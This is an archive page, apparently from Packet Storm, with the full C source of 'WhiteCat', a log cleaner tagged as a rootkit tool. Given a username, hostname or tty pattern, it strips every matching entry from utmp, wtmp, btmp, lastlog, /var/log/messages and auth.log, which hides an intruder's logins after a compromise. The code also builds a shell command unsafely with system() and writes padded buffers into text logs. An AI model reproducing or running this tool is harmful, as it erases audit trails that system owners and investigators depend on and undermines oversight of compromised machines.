accept no compromises

whitecat.c

whitecat.c
Posted Mar 29, 2007
Authored by ShadOS | Site hellknights.void.ru

WhiteCat log cleaner version 1.0. WhiteCat is designed for any UNIX-like system, but tested only on Linux. Distributed under GPLv2.

tags | tool, rootkit
systems | linux, unix
MD5 | efd550ecc4b29bb2544da6a8e072ce57

whitecat.c

Change Mirror Download
/*
* This is WhiteCat logcleaner version 1.0 by ShadOS from Hell Knights Crew.
* It supports perl compatible regular expressions and cleans any binary and
* text log files (just correct source a little). WhiteCat is designed for
* any UNIX-like system, but tested only on Linux. Distributed under GPLv2.
* Use it only for educational purpose.
* Don't forget to visit our site and my homepage for new releases:
* http://hellknights.void.ru
* http://shados.0x48k.cc
* Also, you can mail me any bugs or suggestions:
* mailto:shados /\./\ real.xakep.ru
* mailto:shados /\./\ 0x48k.cc
*
* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <utmp.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <lastlog.h>
#include <string.h>
#include <regex.h>
#include <limits.h> /* for PATH_MAX */
#include <getopt.h>


#ifndef UTMP_FILE
#define UTMP_FILE "/var/run/utmp"
#endif
#ifndef WTMP_FILE
#define WTMP_FILE "/var/log/wtmp"
#endif

//modify parametrs as in your box ;)
#define BTMP_FILE "/var/log/btmp"
#define LASTLOG_FILE "/var/log/lastlog"
#define MESSAGES_FILE "/var/log/messages"
#define SECURE_FILE "/var/log/auth.log"

#define MAXBUFF 8*1024

#define PROGRAM_NAME "WhiteCat logcleaner"
#define PROGRAM_VERSION 1.0
#define AUTHOR "Shad0S [Hell Knights Crew]"

char *myname; /* for error messages */
int do_ignorecase = 0; /* -i option: ignore case */
int do_extended = 0; /* -E option: use extended RE's */
int do_username = 0;
int do_hostname = 0;
int do_tty = 0;
int errors = 0; /* number of errors */

/* patterns to match */
regex_t username;
regex_t hostname;
regex_t tty;

void copy_tmp(char *dstfilename, char *tmpfilename);
void clear_textlog(char *filename);
void clear_uwbtmp(char *filename);
void clear_lastlog (char *filename);
regex_t compile_pattern(const char *pat);
int process_regexp(regex_t *pattern, char *buf, size_t size);
void usage(void);
void version(void);

int main(int argc, char *argv[])
{
myname = argv[0];

char c;

struct option longopts[]={
{ "user", required_argument, &do_username, 'u'},
{ "tty", required_argument, &do_tty, 't'},
{ "hostname", required_argument, &do_hostname, 'a'},
{ "extended", no_argument, &do_extended, 'e'},
{ "ignore", no_argument, &do_ignorecase, 'i'},
{ "help", no_argument, NULL, 'h'},
{ "version", no_argument, NULL, 'V'},
{ 0, 0, 0, 0 }
};

if ((argc < 2) || (argc > 18)) {
version();
usage();
}

while ((c=getopt_long(argc,argv,"u:t:a:reihVW;",longopts,NULL)) != -1) {
switch (c) {
case 'u':
username = compile_pattern(optarg);
if (errors) usage(); //compile failed
do_username=1;
break;
case 't':
tty = compile_pattern(optarg);
if (errors) usage(); //compile failed
do_tty=1;
break;
case 'a':
hostname = compile_pattern(optarg);
if (errors) usage(); //compile failed
do_hostname=1;
break;
case 'e':
do_extended = 1;
break;
case 'i':
do_ignorecase = 1;
break;
case 'h':
version();
usage();
case 'V':
version();
exit(0);
break;
case 0:
break;
case ':':
fprintf(stderr, "%s: option '-%c' requires an argument\n",
myname, optopt);
usage();
case '?':
default:
fprintf(stderr, "%s: option '-%c' is invalid: ignored\n",
myname, optopt);
usage();
}
}

//sanity check
if (!do_username && !do_tty && !do_hostname){
fprintf(stderr, "%s: didn't found any parametr to clean (username, hostname, tty)!\n",
myname);
usage();
}

clear_uwbtmp(UTMP_FILE);
printf("utmp cleaning \t\t \033[1m[ OK ]\033[0m\n");
clear_uwbtmp(WTMP_FILE);
printf("wtmp cleaning \t\t \033[1m[ OK ]\033[0m\n");
clear_uwbtmp(BTMP_FILE);
printf("btmp cleaning \t\t \033[1m[ OK ]\033[0m\n");
clear_lastlog(LASTLOG_FILE);
printf("lastlog cleaning \t \033[1m[ OK ]\033[0m\n");
clear_textlog(MESSAGES_FILE);
printf("messages cleaning \t \033[1m[ OK ]\033[0m\n");
clear_textlog(SECURE_FILE);
printf("secure cleaning \t \033[1m[ OK ]\033[0m\n");

return 0;
}

/* replace logfile with tempfile */
void copy_tmp(char *dstfilename, char *tmpfilename)
{
char buffer[BUFSIZ];

sprintf(buffer, "cat %s > %s", tmpfilename, dstfilename);
printf("%s\n", buffer);

if (system(buffer) < 0) {
printf("Error copying from tempfile!");
exit(-1);
}

unlink(tmpfilename);
}


/* cleanup plaintext logfiles */
void clear_textlog(char *filename)
{
char buftmp[MAXBUFF];
FILE *fd;
int fdtmp;
int found = 0;
static char template[] = "/tmp/tmpfileXXXXXX";
char ftmpname[PATH_MAX];

if ( (fd = fopen(filename, "r")) == 0) {
perror(filename);
exit(-1);
}

strcpy(ftmpname, template);
fdtmp = mkstemp(ftmpname);

while (fgets(buftmp, MAXBUFF, fd) != NULL)
{
if (do_hostname) found = process_regexp(&hostname, buftmp, sizeof(buftmp));
if (do_username) found = process_regexp(&username, buftmp, sizeof(buftmp));
if (do_tty) found = process_regexp(&tty, buftmp, sizeof(buftmp));
if (!found) write(fdtmp, &buftmp, sizeof(buftmp));
found = 0;
}

fclose(fd);
close(fdtmp);

copy_tmp(filename, ftmpname);
}


/* cleanup binary log entries */
void clear_uwbtmp(char *filename)
{
struct utmp entry;
int fd;
int fdtmp;
int found = 0;
static char template[] = "/tmp/tmpfileXXXXXX";
char ftmpname[PATH_MAX];

if ( (fd = open(filename, O_RDONLY)) == -1) {
perror(filename);
exit(-1);
}

strcpy(ftmpname, template);
fdtmp = mkstemp(ftmpname);

while (read(fd, &entry, sizeof(struct utmp)) > 0)
{
if (do_hostname) found = process_regexp(&hostname, entry.ut_host, sizeof(entry.ut_host));
if (do_username) found = process_regexp(&username, entry.ut_user, sizeof(entry.ut_user));
if (do_tty) found = process_regexp(&tty, entry.ut_line, sizeof(entry.ut_line));
if (!found) write(fdtmp, &entry, sizeof(struct utmp));
found = 0;
}

close(fd);
close(fdtmp);

copy_tmp(filename, ftmpname);
}


/* cleanup lastlog binary file with holes */
void clear_lastlog (char *filename)
{
struct passwd *pwd;
struct lastlog entry;
int uid = 0;
int found = 0;
int fd;

if ( (fd = open(filename, O_RDWR)) < 0) {
perror(filename);
exit(-1);
}

/* set position to the beginning of the file */
lseek(fd, (off_t) 0, SEEK_SET);
while (read(fd, &entry, sizeof(struct lastlog)) > 0)
{
if (do_username) {
if ((pwd = getpwuid(uid))!=NULL)
found = process_regexp(&username, pwd->pw_name, sizeof(pwd->pw_name));
uid++;
}
if (do_hostname) found = process_regexp(&hostname, entry.ll_host, sizeof(entry.ll_host));
if (do_tty) found = process_regexp(&tty, entry.ll_line, sizeof(entry.ll_line));
if (found)
{
lseek(fd, -(off_t)sizeof(struct lastlog), SEEK_CUR);
//XXX is this 3 lines correct?
entry.ll_time = 0;
strcpy (entry.ll_line, " ");
strncpy (entry.ll_host, " ", 5);
found = 0;
}
write (fd, &entry, sizeof(struct lastlog));

}
close(fd);
}


/* compile the regex pattern */
regex_t compile_pattern(const char *pat)
{
int flags = REG_NOSUB; /* don't need where-matched info */
int ret;
regex_t pattern;
#define MSGBUFSIZE 512 /* arbitrary */
char error[MSGBUFSIZE];

if (do_ignorecase)
flags |= REG_ICASE;
if (do_extended)
flags |= REG_EXTENDED;

ret = regcomp(&pattern, pat, flags);
if (ret != 0) {
(void) regerror(ret, &pattern, error, sizeof error);
fprintf(stderr, "%s: pattern `%s': %s\n", myname, pat, error);
errors++;
}
else
return pattern;
}


/* process regular expression */
int process_regexp(regex_t *pattern, char *buf, size_t size)
{
char error[MSGBUFSIZE];
int ret;

if ((ret = regexec(pattern, buf, 0, NULL, 0)) != 0) {
if (ret != REG_NOMATCH) {
(void) regerror(ret, pattern, error, sizeof error);
fprintf(stderr, "%s: %s\n", myname, error);
errors++;
return 0;
}
return 0;
}
else
return 1;
}


/* print usage message and exit with 0x48k status */
void usage(void)
{
printf("Usage:\n");
printf("\t %s [-u user] [-t tty] [-a hostname|ipaddr] [OPTIONS]\n", myname);
printf("OPTIONS:\n");
printf("\t -i --ignore \t ignore case in regexps\n");
printf("\t -e --extended \t use extended regexps\n");
printf("\t -V --version \t show version info and exit\n");
printf("\t -h --help \t show this help screen and exit\n");
printf("\n");
exit(0x48);
}

/* print version information */
void version(void)
{
fprintf(stdout, "\t ================================================================\n");
fprintf(stdout, "\t = \033[1m%s %1.1f by %s, 2007.\033[0m =\n", PROGRAM_NAME, PROGRAM_VERSION, AUTHOR);
fprintf(stdout, "\t ================================================================\n");
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    2 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close